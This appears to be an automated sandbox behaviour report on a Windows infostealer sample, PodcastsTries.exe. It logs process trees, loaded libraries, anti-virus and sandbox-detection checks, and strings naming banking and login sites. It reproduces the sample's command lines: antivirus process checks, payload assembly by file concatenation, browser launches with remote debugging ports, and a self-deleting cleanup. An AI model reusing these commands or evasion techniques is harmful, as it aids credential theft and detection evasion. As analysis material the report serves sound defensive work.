                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\PodcastsTries.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Assessing Assessing.cmd & Assessing.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 680662Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Memo
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "OBTAINING" Compensation
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Honey + ..\Biotechnology + ..\Enzyme + ..\Harvard T
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\680662\Billion.com Billion.com T
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\680662\Billion.com" & rd /s /q "C:\ProgramData\IMYUKNY5XBIE" & exit
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 --field-trial-handle=2236,i,6734849523328560890,2082883044191278633,262144 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2704 --field-trial-handle=2644,i,11626362328839299317,9747645851488831929,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2052,i,17749502471063055911,16474361137930384879,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2412,i,5564331809908688110,6573540988472131423,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6356 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6704 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6980 --field-trial-handle=1992,i,15107475950589373331,2325899341501717077,262144 /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: shfolder.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: riched20.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: usp10.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: msls31.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: textinputframework.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: coreuicomponents.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: coremessaging.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: napinsp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: pnrpnsp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: wshbth.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: nlaapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: winrnr.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: dbghelp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: fwpuclnt.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: schannel.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: mskeyprotect.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: dpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: ntshrui.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: cscapi.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: linkinfo.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: pcacli.dll
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\PodcastsTries.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: PodcastsTries.exe Static file information: File size 1259108 > 1048576
                Source: PodcastsTries.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress
                Source: PodcastsTries.exe Static PE information: real checksum: 0x1372e1 should be: 0x135a54
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001802D8 push cs; retn 0017h
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00150DE6 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0014DC7C push AA0018CFh; iretd

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\680662\Billion.com

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001C26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0014FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\PodcastsTries.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_12-103951
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com API coverage: 3.8 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 7860 Thread sleep count: 39 > 30
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\timeout.exe Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\PodcastsTries.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019DC54
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001AA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA087
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001AA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_001AA1E2
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,12_2_0019E472
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001AA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,12_2_001AA570
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0016C622 FindFirstFileExW,12_2_0016C622
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001A66DC FindFirstFileW,FindNextFileW,FindClose,12_2_001A66DC
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001A7333 FindFirstFileW,FindClose,12_2_001A7333
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001A73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,12_2_001A73D4
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0019D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_0019D921
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_00135FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00135FC8
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\680662
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\680662\
                Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: chrome.exe, 00000012.00000002.2812352313.0000278000B44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
                Source: 58YU37.12.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: 58YU37.12.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
                Source: chrome.exe, 00000012.00000002.2810617984.0000278000680000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
                Source: Billion.com, 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWCBE0A7645AEA3A51
                Source: 58YU37.12.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: 58YU37.12.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: 58YU37.12.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: 58YU37.12.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000015.00000003.2860520871.00002660002B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
                Source: 58YU37.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: 58YU37.12.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: chrome.exe, 00000012.00000002.2804727750.000002584920B000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2878921509.0000015CA5644000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2988186781.000002B254643000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 58YU37.12.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: 58YU37.12.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: chrome.exe, 00000012.00000002.2812095120.0000278000A64000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b6e1958d-ab33-48d8-813d-6a77e8b9dd9c
                Source: 58YU37.12.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: 58YU37.12.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: 58YU37.12.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: 58YU37.12.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: 58YU37.12.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: 58YU37.12.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 58YU37.12.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 58YU37.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: 58YU37.12.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 58YU37.12.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Process information queried: ProcessInformation
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_001AF4FF BlockInput,12_2_001AF4FF
                Source: C:\Users\user\AppData\Local\Temp\680662\Billion.com Code function: 12_2_0013338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_0013338B
